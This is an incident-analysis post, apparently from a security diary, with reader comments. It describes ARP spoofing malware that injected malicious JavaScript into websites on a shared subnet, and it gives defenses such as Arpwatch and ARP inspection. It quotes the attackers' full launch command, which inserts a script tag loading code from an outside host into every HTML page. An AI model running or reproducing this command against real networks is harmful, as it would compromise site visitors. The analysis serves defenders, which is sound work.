My next class:

Massive ARP spoofing attacks on web sites

Published: 2009-03-11. Last Updated: 2009-03-11 00:34:49 UTC
by Bojan Zdrnja (Version: 1)
12 comment(s)

Recently I’ve been involved in two incidents which had exactly the same modus operandi. The attackers used ARP spoofing to inject malicious JavaScript into content served off other web sites. The biggest problem with such attacks is that it can be very difficult to analyze them unless you remember to check layer two network traffic. Such attacks are very covert and put in danger all web sites in the same subnet.

So, first a short recap about ARP spoofing. ARP spoofing attacks happen on layer two – the Address Resolution Protocol maps IP addresses and MAC addresses, which is what is used to communicate in local subnets. ARP spoofing attacks are nothing new – they have been happening for years already. The basic idea of an ARP spoofing attack is for the attacker to spoof IP address <-> MAC address pair of the default gateway. This allows him to intercept (and, if needed modify) all outgoing traffic from that subnet. The attacker can also spoof the IP address <-> MAC address pair of a local server in which case he could monitor incoming traffic, but in this scenario that was not necessary.

The spoofing attack consists of the attacker sending ARP packets containing fake data to the target. In normal conditions the target machine will accept this and “believe” whatever the attacker is saying.

This is exactly what happened in both incidents I was involved in. A server on a local subnet was compromised and the attacker installed ARP spoofing malware (together with keyloggers and other Trojans) on the machine. The ARP spoofing malware poisoned local subnet so the outgoing traffic was tunneled through it. The same malware then inserted malicious JavaScript into every HTML page served by any server on that subnet. You can see how this is fruitful for the attacker – with one compromised server they can effectively attack hundreds of web sites (if it’s a hoster indeed).

The ARP spoofing malware they used was relatively common, but still AV detection was miserable with major AV programs missing it (both compromised machines had up to date AV programs installed). In order to start the malware the attackers used a simple BAT script:

svchost.exe -idx 0 -ip IP_address -port 80 -insert "<script language=javascript src=http://embedded/images/new.gif></script>" -Interval 1000 -spoofmode 2

svchost.exe’s options are self explanatory – it uses the interface 0 (idx) and spoofs the IP address in the ip option. Finally it inserts whatever is in the insert option into every HTML page served.

Nice thing for the attacker is that the administrator of an attacked web site will never figure out what’s going on until he checks the ARP cache or monitors network traffic. The ARP cache can be checked with the arp command (arp –a on both Windows and Linux) – one should watch out for weird MAC addresses. It usually pays to check the OID owner because you don’t see Dell routers all that often as shown in the following Wireshark screenshot of ARP poisoning traffic:

ARP poisoning

There are various ways for defending against ARP spoofing. One can hard code MAC addresses of routers on servers (be careful with this as changes to the default gateway will stop your machines from talking to the Internet until you modify the hard coded address). I would recommend installation of Arpwatch, a nice and simple tool that monitors ARP traffic and alerts on attacks. Finally, Cisco (and others I presume) has features called DHCP Snooping and ARP inspection which can effectively stop ARP poisoning attacks. Sadly, I rarely see these features used, especially in internal network.

Regarding other malware I mentioned previously, the AV detection rates were similarly poor (in the mean time they improved). Particularly nasty was the Winlogon Notify hook package which simply “sniffs” all usernames/passwords of users logging in to the system (so password changes don’t help). This package has been around for ages (the source is public) and I was shocked how simple modifications made it “invisible” to those AV programs.

--
Bojan
INFIGO IS 

Keywords: arp spoofing
12 comment(s)
My next class:

Comments

"In order to start the malware the attackers used a simple BAT script" ...
My assumption: the svchost.exe being called is the legitimate one that comes with Windows. Correct?

I can't seem to find related reference documentation on Microsoft that clearly and completely explains svchost.exe's feature set. Can someone point me to this reference material please?

http://social.msdn.microsoft.com/Search/en-US/?query=svchost.exe%20spoofmode&resultsLang=en-GB&ac=8
No Results Found
I'm gathering svchost.exe was the malware.
Hi Bart. Yes, svchost.exe was the malware they dropped on the system (sorry, I should have been probably more clear about that).
Thanks Bojan.
Fasinating, really. Is the tool able to follow the TCP stream and read the HTTP header ? If it doesn't it's likely to add the link at the end of each frame instead of at the end of each HTML page. The result will probably be corrupted binaries (including images) and pages and that could help detection. Also, Arpwatch is, apparently, *nix only while this attack is apparently based on a windows system. What could be appropriate defenses for co-hosted windows machines, then ?
Stephane, yes the tool is able to read the HTTP header so it injected the malicious script tag only into HTML pages. The malicious script tag was inserted at the beginning of HTML pages.

Regarding arpwatch, you are right that this is a *nix only tool. I'm not sure about similar Windows tools -- if we get some submissions from our readers I will update the diary. The best defense are those special features, if the network gear supports them.
Thanks for the details, Bojan. Please update the diary if you hear about a windows tool that would do the same thing as arpwatch. As a result of your article, I'm writing such a tool right now (using winPcap) but I'd rather not reinvent the wheel :P
Stephane, will do. If you manage to finish the tool let us know, I'm sure other readers will be interested in it as well.
There is an alternative program to arpwatch for windows - it is called ARP Monitor. It's in beta stage from early 2008 till now, but is usable and have a few bugs that don't affect it's performance. This program has an English interface though the author of this program is from Russia. The program uses winpcap, so it should be downloaded and installed separately for program to work. Here is a link to the author's blog (sorry, it's in Russian) http://blog.kmint21.com/2008/03/12/arp-monitor/
The direct link to the program: http://blog.kmint21.com/kmint21-arp-monitor.exe

btw, in one of his posts that is dated nearly a year ago author of this program says that he is managed to catch with this program virus with the similar behavior...
Small update to my previous post - the updated version of ARP Monitor tool is available from http://binaryplant.com/ The new version includes some bug fixes to bugs that were discovered in first beta.

Diary Archives